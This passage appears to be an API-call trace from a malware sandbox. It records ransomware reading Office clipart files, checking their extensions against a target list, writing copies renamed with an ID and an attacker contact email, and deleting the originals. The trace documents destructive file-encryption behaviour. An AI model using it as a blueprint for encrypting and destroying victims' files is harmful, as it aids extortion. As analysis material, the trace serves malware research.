	[0058.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.869] lstrlenW (lpString=".zip") returned 4
	[0058.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.869] lstrlenW (lpString=".rar") returned 4
	[0058.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.869] lstrlenW (lpString=".bz2") returned 4
	[0058.869] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.869] lstrlenW (lpString=".7z") returned 3
	[0058.869] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.870] lstrlenW (lpString=".dbf") returned 4
	[0058.870] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.870] lstrlenW (lpString=".1cd") returned 4
	[0058.870] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.870] lstrlenW (lpString=".jpg") returned 4
	[0058.870] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.870] lstrlenW (lpString=".doc") returned 4
	[0058.870] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString=".docx") returned 5
	[0058.870] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.870] lstrlenW (lpString=".pdf") returned 4
	[0058.870] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString=".xls") returned 4
	[0058.870] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.870] lstrlenW (lpString=".xlsx") returned 5
	[0058.870] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.870] lstrlenW (lpString=".ppt") returned 4
	[0058.870] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.870] lstrlenW (lpString=".zip") returned 4
	[0058.870] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.870] lstrlenW (lpString=".rar") returned 4
	[0058.870] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString=".bz2") returned 4
	[0058.870] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString=".7z") returned 3
	[0058.870] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.870] lstrlenW (lpString=".dbf") returned 4
	[0058.870] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.871] lstrlenW (lpString=".1cd") returned 4
	[0058.871] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63
	[0058.871] lstrlenW (lpString=".jpg") returned 4
	[0058.871] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.871] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.871] lstrlenW (lpString="AN01184_.WMF") returned 12
	[0058.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.871] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3746) returned 1
	[0058.871] CloseHandle (hObject=0x188) returned 1
	[0058.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 0x20
	[0058.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.871] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.871] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0058.872] GetLastError () returned 0x0
	[0058.872] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xea2, lpOverlapped=0x0) returned 1
	[0058.873] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xeb0, lpOverlapped=0x0) returned 1
	[0058.874] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.874] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.874] SetEndOfFile (hFile=0x158) returned 1
	[0058.874] CloseHandle (hObject=0x158) returned 1
	[0058.875] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.875] SetEndOfFile (hFile=0x188) returned 1
	[0058.875] CloseHandle (hObject=0x188) returned 1
	[0058.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 1
	[0058.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.876] lstrlenW (lpString=".doc") returned 4
	[0058.876] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.876] lstrlenW (lpString=".docx") returned 5
	[0058.876] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.876] lstrlenW (lpString=".pdf") returned 4
	[0058.876] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.876] lstrlenW (lpString=".xls") returned 4
	[0058.876] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.876] lstrlenW (lpString=".xlsx") returned 5
	[0058.876] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.876] lstrlenW (lpString=".ppt") returned 4
	[0058.876] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.876] lstrlenW (lpString=".zip") returned 4
	[0058.876] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.876] lstrlenW (lpString=".rar") returned 4
	[0058.876] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.876] lstrlenW (lpString=".bz2") returned 4
	[0058.876] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.876] lstrlenW (lpString=".7z") returned 3
	[0058.876] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.876] lstrlenW (lpString=".dbf") returned 4
	[0058.876] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.876] lstrlenW (lpString=".1cd") returned 4
	[0058.876] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.877] lstrlenW (lpString=".jpg") returned 4
	[0058.877] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.877] lstrlenW (lpString=".doc") returned 4
	[0058.877] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString=".docx") returned 5
	[0058.877] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.877] lstrlenW (lpString=".pdf") returned 4
	[0058.877] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString=".xls") returned 4
	[0058.877] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0058.877] lstrlenW (lpString=".xlsx") returned 5
	[0058.877] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0058.877] lstrlenW (lpString=".ppt") returned 4
	[0058.877] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.877] lstrlenW (lpString=".zip") returned 4
	[0058.877] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0058.877] lstrlenW (lpString=".rar") returned 4
	[0058.877] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString=".bz2") returned 4
	[0058.877] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString=".7z") returned 3
	[0058.877] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0058.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.877] lstrlenW (lpString=".dbf") returned 4
	[0058.877] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.877] lstrlenW (lpString=".1cd") returned 4
	[0058.877] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0058.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63
	[0058.877] lstrlenW (lpString=".jpg") returned 4
	[0058.877] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0058.878] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0058.878] lstrlenW (lpString="AN01216_.WMF") returned 12
	[0058.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.878] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=5836) returned 1
	[0058.878] CloseHandle (hObject=0x188) returned 1
	[0058.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 0x20
	[0058.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.878] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.878] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0058.879] GetLastError () returned 0x0
	[0058.879] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x16cc, lpOverlapped=0x0) returned 1
	[0059.028] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x16d0, lpOverlapped=0x0) returned 1
	[0059.029] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.029] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.029] SetEndOfFile (hFile=0x158) returned 1
	[0059.208] CloseHandle (hObject=0x158) returned 1
	[0059.216] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.222] SetEndOfFile (hFile=0x188) returned 1
	[0059.239] CloseHandle (hObject=0x188) returned 1
	[0059.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 1
	[0059.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.247] lstrlenW (lpString=".doc") returned 4
	[0059.247] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.247] lstrlenW (lpString=".docx") returned 5
	[0059.247] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.247] lstrlenW (lpString=".pdf") returned 4
	[0059.247] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.247] lstrlenW (lpString=".xls") returned 4
	[0059.247] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.247] lstrlenW (lpString=".xlsx") returned 5
	[0059.247] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.247] lstrlenW (lpString=".ppt") returned 4
	[0059.247] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.247] lstrlenW (lpString=".zip") returned 4
	[0059.247] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.247] lstrlenW (lpString=".rar") returned 4
	[0059.247] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.247] lstrlenW (lpString=".bz2") returned 4
	[0059.247] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.247] lstrlenW (lpString=".7z") returned 3
	[0059.247] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.247] lstrlenW (lpString=".dbf") returned 4
	[0059.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.247] lstrlenW (lpString=".1cd") returned 4
	[0059.247] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.247] lstrlenW (lpString=".jpg") returned 4
	[0059.247] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.248] lstrlenW (lpString=".doc") returned 4
	[0059.248] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString=".docx") returned 5
	[0059.248] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.248] lstrlenW (lpString=".pdf") returned 4
	[0059.248] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString=".xls") returned 4
	[0059.248] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.248] lstrlenW (lpString=".xlsx") returned 5
	[0059.248] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.248] lstrlenW (lpString=".ppt") returned 4
	[0059.248] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.248] lstrlenW (lpString=".zip") returned 4
	[0059.248] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.248] lstrlenW (lpString=".rar") returned 4
	[0059.248] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString=".bz2") returned 4
	[0059.248] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString=".7z") returned 3
	[0059.248] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.248] lstrlenW (lpString=".dbf") returned 4
	[0059.248] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.248] lstrlenW (lpString=".1cd") returned 4
	[0059.248] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63
	[0059.248] lstrlenW (lpString=".jpg") returned 4
	[0059.248] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.249] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.249] lstrlenW (lpString="AN04195_.WMF") returned 12
	[0059.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.249] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=4612) returned 1
	[0059.249] CloseHandle (hObject=0x188) returned 1
	[0059.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf")) returned 0x20
	[0059.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0059.250] GetLastError () returned 0x0
	[0059.250] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1204, lpOverlapped=0x0) returned 1
	[0059.251] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1210, lpOverlapped=0x0) returned 1
	[0059.252] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.252] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.252] SetEndOfFile (hFile=0x158) returned 1
	[0059.252] CloseHandle (hObject=0x158) returned 1
	[0059.252] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.252] SetEndOfFile (hFile=0x188) returned 1
	[0059.253] CloseHandle (hObject=0x188) returned 1
	[0059.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf")) returned 1
	[0059.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.254] lstrlenW (lpString=".doc") returned 4
	[0059.254] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.254] lstrlenW (lpString=".docx") returned 5
	[0059.254] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.254] lstrlenW (lpString=".pdf") returned 4
	[0059.254] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.254] lstrlenW (lpString=".xls") returned 4
	[0059.254] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.254] lstrlenW (lpString=".xlsx") returned 5
	[0059.254] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.254] lstrlenW (lpString=".ppt") returned 4
	[0059.254] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.254] lstrlenW (lpString=".zip") returned 4
	[0059.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.254] lstrlenW (lpString=".rar") returned 4
	[0059.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.254] lstrlenW (lpString=".bz2") returned 4
